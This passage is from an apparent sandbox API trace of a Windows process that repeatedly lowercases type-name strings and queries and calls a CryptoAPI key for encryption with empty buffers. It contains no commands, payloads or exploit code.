dwFlags=0x0 | out: pbData=0x6bb578*=0x660e, pdwDataLen=0x61dda8*=0x4) returned 1 [0077.443] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.443] CryptEncrypt (in: hKey=0x6b8ab8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x61e2d8*=0x0, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x61e2d8*=0x0) returned 1 [0077.443] CharLowerBuffW (in: lpsz="byte[1]", cchLength=0x7 | out: lpsz="byte[1]") returned 0x7 [0077.443] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.443] CryptEncrypt (in: hKey=0x6b8ab8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6bb558*, pdwDataLen=0x61e2d8*=0x0, dwBufLen=0x0 | out: pbData=0x6bb558*, pdwDataLen=0x61e2d8*=0x0) returned 1 [0077.443] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0077.443] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.443] CryptGetKeyParam (in: hKey=0x6b8ab8, dwParam=0x7, pbData=0x6bb438, pdwDataLen=0x61dda8, dwFlags=0x0 | out: pbData=0x6bb438*=0x660e, pdwDataLen=0x61dda8*=0x4) returned 1 [0077.443] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.443] CryptEncrypt (in: hKey=0x6b8ab8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x61e2d8*=0x0, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x61e2d8*=0x0) returned 1 [0077.443] CharLowerBuffW (in: lpsz="byte[1]", cchLength=0x7 | out: lpsz="byte[1]") returned 0x7 [0077.443] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.443] CryptEncrypt (in: hKey=0x6b8ab8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6bb498*, pdwDataLen=0x61e2d8*=0x0, dwBufLen=0x0 | out: pbData=0x6bb498*, pdwDataLen=0x61e2d8*=0x0) returned 1 [0077.444] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0077.454] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.455] CryptGetKeyParam (in: hKey=0x6b8ab8, dwParam=0x7, pbData=0x6bb4b8, pdwDataLen=0x61dda8, dwFlags=0x0 | out: pbData=0x6bb4b8*=0x660e, pdwDataLen=0x61dda8*=0x4) returned 1 [0077.455] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.455] CryptEncrypt (in: hKey=0x6b8ab8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x61e2d8*=0x0, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x61e2d8*=0x0) returned 1 [0077.455] CharLowerBuffW (in: lpsz="byte[1]", cchLength=0x7 | out: lpsz="byte[1]") returned 0x7 [0077.455] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.455] CryptEncrypt (in: hKey=0x6b8ab8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6bb5c8*, pdwDataLen=0x61e2d8*=0x0, dwBufLen=0x0 | out: pbData=0x6bb5c8*, pdwDataLen=0x61e2d8*=0x0) returned 1 [0077.455] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0077.455] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.455] CryptGetKeyParam (in: hKey=0x6b8ab8, dwParam=0x7, pbData=0x6bb558, pdwDataLen=0x61dda8, dwFlags=0x0 | out: pbData=0x6bb558*=0x660e, pdwDataLen=0x61dda8*=0x4) returned 1 [0077.455] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.455] CryptEncrypt (in: hKey=0x6b8ab8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x61e2d8*=0x0, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x61e2d8*=0x0) returned 1 [0077.456] CharLowerBuffW (in: lpsz="byte[1]", cchLength=0x7 | out: lpsz="byte[1]") returned 0x7 [0077.456] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.456] CryptEncrypt (in: hKey=0x6b8ab8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6bb488*, pdwDataLen=0x61e2d8*=0x0, dwBufLen=0x0 | out: pbData=0x6bb488*, pdwDataLen=0x61e2d8*=0x0) returned 1 [0077.456] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0077.457] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.457] CryptGetKeyParam (in: hKey=0x6b8ab8, dwParam=0x7, pbData=0x6bb498, pdwDataLen=0x61dda8, dwFlags=0x0 | out: pbData=0x6bb498*=0x660e, pdwDataLen=0x61dda8*=0x4) returned 1 [0077.457] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.457] CryptEncrypt (in: hKey=0x6b8ab8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x61e2d8*=0x0, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x61e2d8*=0x0) returned 1 [0077.457] CharLowerBuffW (in: lpsz="byte[1]", cchLength=0x7 | out: lpsz="byte[1]") returned 0x7 [0077.457] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.457] CryptEncrypt (in: hKey=0x6b8ab8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6bb568*, pdwDataLen=0x61e2d8*=0x0, dwBufLen=0x0 | out: pbData=0x6bb568*, pdwDataLen=0x61e2d8*=0x0) returned 1 [0077.457] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0077.457] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.457] CryptGetKeyParam (in: hKey=0x6b8ab8, dwParam=0x7, pbData=0x6bb5c8, pdwDataLen=0x61dda8, dwFlags=0x0 | out: pbData=0x6bb5c8*=0x660e, pdwDataLen=0x61dda8*=0x4) returned 1 [0077.457] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.457] CryptEncrypt (in: hKey=0x6b8ab8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x61e2d8*=0x0, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x61e2d8*=0x0) returned 1 [0077.457] CharLowerBuffW (in: lpsz="byte[1]", cchLength=0x7 | out: lpsz="byte[1]") returned 0x7 [0077.458] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.458] CryptEncrypt (in: hKey=0x6b8ab8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6bb648*, pdwDataLen=0x61e2d8*=0x0, dwBufLen=0x0 | out: pbData=0x6bb648*, pdwDataLen=0x61e2d8*=0x0) returned 1 [0077.458] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0077.458] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.458] CryptGetKeyParam (in: hKey=0x6b8ab8, dwParam=0x7, pbData=0x6bb488, pdwDataLen=0x61dda8, dwFlags=0x0 | out: pbData=0x6bb488*=0x660e, pdwDataLen=0x61dda8*=0x4) returned 1 [0077.458] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.459] CryptEncrypt (in: hKey=0x6b8ab8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x61e2d8*=0x0, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x61e2d8*=0x0) returned 1 [0077.459] CharLowerBuffW (in: lpsz="byte[1]", cchLength=0x7 | out: lpsz="byte[1]") returned 0x7 [0077.459] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.459] CryptEncrypt (in: hKey=0x6b8ab8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6bb3b8*, pdwDataLen=0x61e2d8*=0x0, dwBufLen=0x0 | out: pbData=0x6bb3b8*, pdwDataLen=0x61e2d8*=0x0) returned 1 [0077.459] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0077.459] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.459] CryptGetKeyParam (in: hKey=0x6b8ab8, dwParam=0x7, pbData=0x6bb568, pdwDataLen=0x61dda8, dwFlags=0x0 | out: pbData=0x6bb568*=0x660e, pdwDataLen=0x61dda8*=0x4) returned 1 [0077.459] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.459] CryptEncrypt (in: hKey=0x6b8ab8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x61e2d8*=0x0, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x61e2d8*=0x0) returned 1 [0077.459] CharLowerBuffW (in: lpsz="byte[1]", cchLength=0x7 | out: lpsz="byte[1]") returned 0x7 [0077.459] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.459] CryptEncrypt (in: hKey=0x6b8ab8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6bb538*, pdwDataLen=0x61e2d8*=0x0, dwBufLen=0x0 | out: pbData=0x6bb538*, pdwDataLen=0x61e2d8*=0x0) returned 1 [0077.459] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0077.459] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.460] CryptGetKeyParam (in: hKey=0x6b8ab8, dwParam=0x7, pbData=0x6bb648, pdwDataLen=0x61dda8, dwFlags=0x0 | out: pbData=0x6bb648*=0x660e, pdwDataLen=0x61dda8*=0x4) returned 1 [0077.460] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.460] CryptEncrypt (in: hKey=0x6b8ab8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x61e2d8*=0x0, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x61e2d8*=0x0) returned 1 [0077.460] CharLowerBuffW (in: lpsz="byte[1]", cchLength=0x7 | out: lpsz="byte[1]") returned 0x7 [0077.460] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.460] CryptEncrypt (in: hKey=0x6b8ab8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6bb578*, pdwDataLen=0x61e2d8*=0x0, dwBufLen=0x0 | out: pbData=0x6bb578*, pdwDataLen=0x61e2d8*=0x0) returned 1 [0077.460] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0077.460] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.460] CryptGetKeyParam (in: hKey=0x6b8ab8, dwParam=0x7, pbData=0x6bb3b8, pdwDataLen=0x61dda8, dwFlags=0x0 | out: pbData=0x6bb3b8*=0x660e, pdwDataLen=0x61dda8*=0x4) returned 1 [0077.460] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.460] CryptEncrypt (in: hKey=0x6b8ab8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x61e2d8*=0x0, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x61e2d8*=0x0) returned 1 [0077.460] CharLowerBuffW (in: lpsz="byte[1]", cchLength=0x7 | out: lpsz="byte[1]") returned 0x7 [0077.461] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.461] CryptEncrypt (in: hKey=0x6b8ab8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6bb438*, pdwDataLen=0x61e2d8*=0x0, dwBufLen=0x0 | out: pbData=0x6bb438*, pdwDataLen=0x61e2d8*=0x0) returned 1 [0077.461] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0077.461] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.461] CryptGetKeyParam (in: hKey=0x6b8ab8, dwParam=0x7, pbData=0x6bb538, pdwDataLen=0x61dda8, dwFlags=0x0 | out: pbData=0x6bb538*=0x660e, pdwDataLen=0x61dda8*=0x4) returned 1 [0077.461] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.461] CryptEncrypt (in: hKey=0x6b8ab8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x61e2d8*=0x0, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x61e2d8*=0x0) returned 1 [0077.461] CharLowerBuffW (in: lpsz="byte[1]", cchLength=0x7 | out: lpsz="byte[1]") returned 0x7 [0077.461] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.462] CryptEncrypt (in: hKey=0x6b8ab8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6bb4b8*, pdwDataLen=0x61e2d8*=0x0, dwBufLen=0x0 | out: pbData=0x6bb4b8*, pdwDataLen=0x61e2d8*=0x0) returned 1 [0077.471] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0077.471] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.471] CryptGetKeyParam (in: hKey=0x6b8ab8, dwParam=0x7, pbData=0x6bb578, pdwDataLen=0x61dda8, dwFlags=0x0 | out: pbData=0x6bb578*=0x660e, pdwDataLen=0x61dda8*=0x4) returned 1 [0077.471] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.471] CryptEncrypt (in: hKey=0x6b8ab8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x61e2d8*=0x0, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x61e2d8*=0x0) returned 1 [0077.471] CharLowerBuffW (in: lpsz="byte[1]", cchLength=0x7 | out: lpsz="byte[1]") returned 0x7 [0077.471] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.471] CryptEncrypt (in: hKey=0x6b8ab8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6bb558*, pdwDataLen=0x61e2d8*=0x0, dwBufLen=0x0 | out: pbData=0x6bb558*, pdwDataLen=0x61e2d8*=0x0) returned 1 [0077.471] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0077.471] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.471] CryptGetKeyParam (in: hKey=0x6b8ab8, dwParam=0x7, pbData=0x6bb438, pdwDataLen=0x61dda8, dwFlags=0x0 | out: pbData=0x6bb438*=0x660e, pdwDataLen=0x61dda8*=0x4) returned 1 [0077.471] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.471] CryptEncrypt (in: hKey=0x6b8ab8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x61e2d8*=0x0, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x61e2d8*=0x0) returned 1 [0077.471] CharLowerBuffW (in: lpsz="byte[1]", cchLength=0x7 | out: lpsz="byte[1]") returned 0x7 [0077.472] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.472] CryptEncrypt (in: hKey=0x6b8ab8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6bb498*, pdwDataLen=0x61e2d8*=0x0, dwBufLen=0x0 | out: pbData=0x6bb498*, pdwDataLen=0x61e2d8*=0x0) returned 1 [0077.472] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0077.472] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.472] CryptGetKeyParam (in: hKey=0x6b8ab8, dwParam=0x7, pbData=0x6bb4b8, pdwDataLen=0x61dda8, dwFlags=0x0 | out: pbData=0x6bb4b8*=0x660e, pdwDataLen=0x61dda8*=0x4) returned 1 [0077.472] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.472] CryptEncrypt (in: hKey=0x6b8ab8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x61e2d8*=0x0, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x61e2d8*=0x0) returned 1 [0077.472] CharLowerBuffW (in: lpsz="byte[1]", cchLength=0x7 | out: lpsz="byte[1]") returned 0x7 [0077.473] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.473] CryptEncrypt (in: hKey=0x6b8ab8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6bb5c8*, pdwDataLen=0x61e2d8*=0x0, dwBufLen=0x0 | out: pbData=0x6bb5c8*, pdwDataLen=0x61e2d8*=0x0) returned 1 [0077.473] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0077.473] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.473] CryptGetKeyParam (in: hKey=0x6b8ab8, dwParam=0x7, pbData=0x6bb558, pdwDataLen=0x61dda8, dwFlags=0x0 | out: pbData=0x6bb558*=0x660e, pdwDataLen=0x61dda8*=0x4) returned 1 [0077.473] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.473] CryptEncrypt (in: hKey=0x6b8ab8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x61e2d8*=0x0, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x61e2d8*=0x0) returned 1 [0077.473] CharLowerBuffW (in: lpsz="byte[1]", cchLength=0x7 | out: lpsz="byte[1]") returned 0x7 [0077.473] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.473] CryptEncrypt (in: hKey=0x6b8ab8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6bb488*, pdwDataLen=0x61e2d8*=0x0, dwBufLen=0x0 | out: pbData=0x6bb488*, pdwDataLen=0x61e2d8*=0x0) returned 1 [0077.474] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0077.474] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.474] CryptGetKeyParam (in: hKey=0x6b8ab8, dwParam=0x7, pbData=0x6bb498, pdwDataLen=0x61dda8, dwFlags=0x0 | out: pbData=0x6bb498*=0x660e, pdwDataLen=0x61dda8*=0x4) returned 1 [0077.474] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.474] CryptEncrypt (in: hKey=0x6b8ab8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x61e2d8*=0x0, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x61e2d8*=0x0) returned 1 [0077.474] CharLowerBuffW (in: lpsz="byte[1]", cchLength=0x7 | out: lpsz="byte[1]") returned 0x7 [0077.474] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.474] CryptEncrypt (in: hKey=0x6b8ab8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6bb568*, pdwDataLen=0x61e2d8*=0x0, dwBufLen=0x0 | out: pbData=0x6bb568*, pdwDataLen=0x61e2d8*=0x0) returned 1 [0077.474] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0077.474] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.474] CryptGetKeyParam (in: hKey=0x6b8ab8, dwParam=0x7, pbData=0x6bb5c8, pdwDataLen=0x61dda8, dwFlags=0x0 | out: pbData=0x6bb5c8*=0x660e, pdwDataLen=0x61dda8*=0x4) returned 1 [0077.474] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.475] CryptEncrypt (in: hKey=0x6b8ab8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x61e2d8*=0x0, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x61e2d8*=0x0) returned 1 [0077.475] CharLowerBuffW (in: lpsz="byte[1]", cchLength=0x7 | out: lpsz="byte[1]") returned 0x7 [0077.475] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.475] CryptEncrypt (in: hKey=0x6b8ab8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6bb648*, pdwDataLen=0x61e2d8*=0x0, dwBufLen=0x0 | out: pbData=0x6bb648*, pdwDataLen=0x61e2d8*=0x0) returned 1 [0077.475] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0077.475] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.475] CryptGetKeyParam (in: hKey=0x6b8ab8, dwParam=0x7, pbData=0x6bb488, pdwDataLen=0x61dda8, dwFlags=0x0 | out: pbData=0x6bb488*=0x660e, pdwDataLen=0x61dda8*=0x4) returned 1 [0077.475] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.475] CryptEncrypt (in: hKey=0x6b8ab8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x61e2d8*=0x0, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x61e2d8*=0x0) returned 1 [0077.475] CharLowerBuffW (in: lpsz="byte[1]", cchLength=0x7 | out: lpsz="byte[1]") returned 0x7 [0077.475] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.475] CryptEncrypt (in: hKey=0x6b8ab8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6bb3b8*, pdwDataLen=0x61e2d8*=0x0, dwBufLen=0x0 | out: pbData=0x6bb3b8*, pdwDataLen=0x61e2d8*=0x0) returned 1 [0077.475] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0077.475] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.475] CryptGetKeyParam (in: hKey=0x6b8ab8, dwParam=0x7, pbData=0x6bb568, pdwDataLen=0x61dda8, dwFlags=0x0 | out: pbData=0x6bb568*=0x660e, pdwDataLen=0x61dda8*=0x4) returned 1 [0077.475] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.476] CryptEncrypt (in: hKey=0x6b8ab8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x61e2d8*=0x0, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x61e2d8*=0x0) returned 1 [0077.476] CharLowerBuffW (in: lpsz="byte[1]", cchLength=0x7 | out: lpsz="byte[1]") returned 0x7 [0077.476] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.476] CryptEncrypt (in: hKey=0x6b8ab8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6bb538*, pdwDataLen=0x61e2d8*=0x0, dwBufLen=0x0 | out: pbData=0x6bb538*, pdwDataLen=0x61e2d8*=0x0) returned 1 [0077.476] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0077.476] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.476] CryptGetKeyParam (in: hKey=0x6b8ab8, dwParam=0x7, pbData=0x6bb648, pdwDataLen=0x61dda8, dwFlags=0x0 | out: pbData=0x6bb648*=0x660e, pdwDataLen=0x61dda8*=0x4) returned 1 [0077.476] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.476] CryptEncrypt (in: hKey=0x6b8ab8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x61e2d8*=0x0, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x61e2d8*=0x0) returned 1 [0077.476] CharLowerBuffW (in: lpsz="byte[1]", cchLength=0x7 | out: lpsz="byte[1]") returned 0x7 [0077.476] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.476] CryptEncrypt (in: hKey=0x6b8ab8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6bb578*, pdwDataLen=0x61e2d8*=0x0, dwBufLen=0x0 | out: pbData=0x6bb578*, pdwDataLen=0x61e2d8*=0x0) returned 1 [0077.476] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0077.476] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.476] CryptGetKeyParam (in: hKey=0x6b8ab8, dwParam=0x7, pbData=0x6bb3b8, pdwDataLen=0x61dda8, dwFlags=0x0 | out: pbData=0x6bb3b8*=0x660e, pdwDataLen=0x61dda8*=0x4) returned 1 [0077.477] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.477] CryptEncrypt (in: hKey=0x6b8ab8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x61e2d8*=0x0, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x61e2d8*=0x0) returned 1 [0077.477] CharLowerBuffW (in: lpsz="byte[1]", cchLength=0x7 | out: lpsz="byte[1]") returned 0x7 [0077.477] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.477] CryptEncrypt (in: hKey=0x6b8ab8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6bb438*, pdwDataLen=0x61e2d8*=0x0, dwBufLen=0x0 | out: pbData=0x6bb438*, pdwDataLen=0x61e2d8*=0x0) returned 1 [0077.477] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0077.477] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.477] CryptGetKeyParam (in: hKey=0x6b8ab8, dwParam=0x7, pbData=0x6bb538, pdwDataLen=0x61dda8, dwFlags=0x0 | out: pbData=0x6bb538*=0x660e, pdwDataLen=0x61dda8*=0x4) returned 1 [0077.477] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.477] CryptEncrypt (in: hKey=0x6b8ab8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x61e2d8*=0x0, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x61e2d8*=0x0) returned 1 [0077.477] CharLowerBuffW (in: lpsz="byte[1]", cchLength=0x7 | out: lpsz="byte[1]") returned 0x7 [0077.477] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.477] CryptEncrypt (in: hKey=0x6b8ab8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6bb4b8*, pdwDataLen=0x61e2d8*=0x0, dwBufLen=0x0 | out: pbData=0x6bb4b8*, pdwDataLen=0x61e2d8*=0x0) returned 1 [0077.480] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0077.480] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.480] CryptGetKeyParam (in: hKey=0x6b8ab8, dwParam=0x7, pbData=0x6bb578, pdwDataLen=0x61dda8, dwFlags=0x0 | out: pbData=0x6bb578*=0x660e, pdwDataLen=0x61dda8*=0x4) returned 1 [0077.480] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.480] CryptEncrypt (in: hKey=0x6b8ab8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x61e2d8*=0x0, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x61e2d8*=0x0) returned 1 [0077.480] CharLowerBuffW (in: lpsz="byte[1]", cchLength=0x7 